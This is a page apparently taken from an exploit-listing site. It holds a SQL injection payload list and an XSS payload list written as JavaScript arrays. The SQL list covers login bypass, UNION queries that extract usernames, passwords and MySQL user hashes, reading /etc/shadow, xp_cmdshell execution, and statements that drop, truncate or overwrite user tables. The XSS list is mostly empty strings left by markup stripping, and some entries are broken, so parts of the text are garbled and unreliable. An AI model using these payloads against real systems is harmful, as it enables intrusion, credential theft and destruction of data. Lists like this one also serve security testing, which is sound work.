Share
## https://sploitus.com/exploit?id=4994503E-B397-57CB-84AC-BE73005C489F
# SQL Injection Payloads List


SQL Injection Payloads List



```python

#๐Ÿ’‰ SQL Injection Payloads List

const sqlPayloads = [
    "'", '"', "' OR 1=1 --", '" OR 1=1 --', "' UNION SELECT 1,2 --", "'; DROP TABLE users; --",
    "' OR 'a'='a", "' OR 'a'='a' --", "'; EXEC xp_cmdshell('ping 127.0.0.1'); --",
    "'; WAITFOR DELAY '0:0:5' --", "'; SELECT SLEEP(5) --", "'; SELECT pg_sleep(5) --",
    "'; SELECT sleep(5) --", "admin'--", "admin' #", "admin'/*", "' OR 1=1#", "' OR 1=1--",
    "' OR '1'='1", "' OR '1'='1'--", "' OR '1'='1'#", "' OR 1=1 LIMIT 1;--",
    "' OR 1=1 LIMIT 1;#", "' OR 1=1 LIMIT 1;/*", "1' OR '1'='1", "1' OR '1'='1'/*",
    "1' OR '1'='1'#", "1' OR 1=1--", "1' OR 1=1#", "1' OR 1=1/*", "' OR ''='", "' OR '='",
    "1' AND '1'='1", "1' AND '1'='2", "' AND 1=1--", "' AND 1=2--", "' AND 'x'='x",
    "' AND 'x'='y", "' AND 1=1 #", "' AND 2>1 --",
    "' UNION ALL SELECT NULL--", "' UNION SELECT NULL,NULL--", "' UNION SELECT NULL,NULL,NULL--",
    "' UNION SELECT username,password FROM users--", "' UNION SELECT database()--",
    "' UNION SELECT user()--", "' UNION SELECT version()--",
    "' AND SLEEP(5)--", "' AND BENCHMARK(10000000,MD5('A'))--", "' OR SLEEP(5)--",
    "1' AND SLEEP(5)#", "' AND IF(1=1,SLEEP(5),0)--",
    "1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT database()),0x7e))--",
    "1' AND UpdateXml(1, Concat(0x7e, (SELECT database()),0x7e), 1)--",
    "1' ORDER BY 1--", "1' ORDER BY 2--", "1' ORDER BY 3--", "1' ORDER BY 4--", "1' ORDER BY 5--",
    "' GROUP BY 1--", "' GROUP BY 2--", "' GROUP BY 3--",
    "1' UNION SELECT table_schema,table_name FROM information_schema.tables--",
    "1' UNION SELECT column_name,column_type FROM information_schema.columns--",
    "' UNION SELECT @@version,NULL--", "' UNION SELECT @@datadir,NULL--",
    "'; DROP TABLE users;--", "'; DELETE FROM users;--", "'; UPDATE users SET password='hacked';--",
    "'; INSERT INTO users VALUES('hacker','hacked');--", "'; TRUNCATE TABLE users;--",
    "' OR 'x'='x' OR 'x'='", "' OR 'a'>'", "' OR 'a'2,'true','false')--",
    "' UNION SELECT IF(1=1,version(),NULL)--",
    "1' UNION SELECT LOAD_FILE('/etc/passwd')--",
    "1' UNION SELECT LOAD_FILE('/etc/shadow')--",
    "' OR SUBSTR(user(),1,1)='a'--", "' OR ASCII(SUBSTR(user(),1,1))>64--",
    "' AND (SELECT COUNT(*) FROM information_schema.tables) > 0--",
    "' AND (SELECT COUNT(*) FROM users) > 0--",
    "' UNION SELECT CAST(id AS CHAR),CAST(name AS CHAR)--",
    "' UNION SELECT CONCAT(user,':',password) FROM mysql.user--",
    "admin' OR 'x'='x' --", "' OR '1'='1' UNION SELECT NULL,NULL--",
    "' OR 1=1 UNION ALL SELECT NULL--",
];


XSS

const xssPayloads = [
    "alert('XSS')", "",
    "javascript:alert(1)", "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "XSS",
    "Click", "Click",
    "Click",
    "", "",
    "", "",
    "",
    "",
    "body{background:url(javascript:alert(1))}",
    "", "",
    "",
    "", "",
    "", "",
    "alert('XSS')", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "", "",
    "eval(atob('YWxlcnQoJ1hTUycpOw=='))",
    "eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))",
    "",
    "",
    "",
    "",
    "alert(1)'>XSS",
    "",
    "'\">alert(1)<\"",
];


```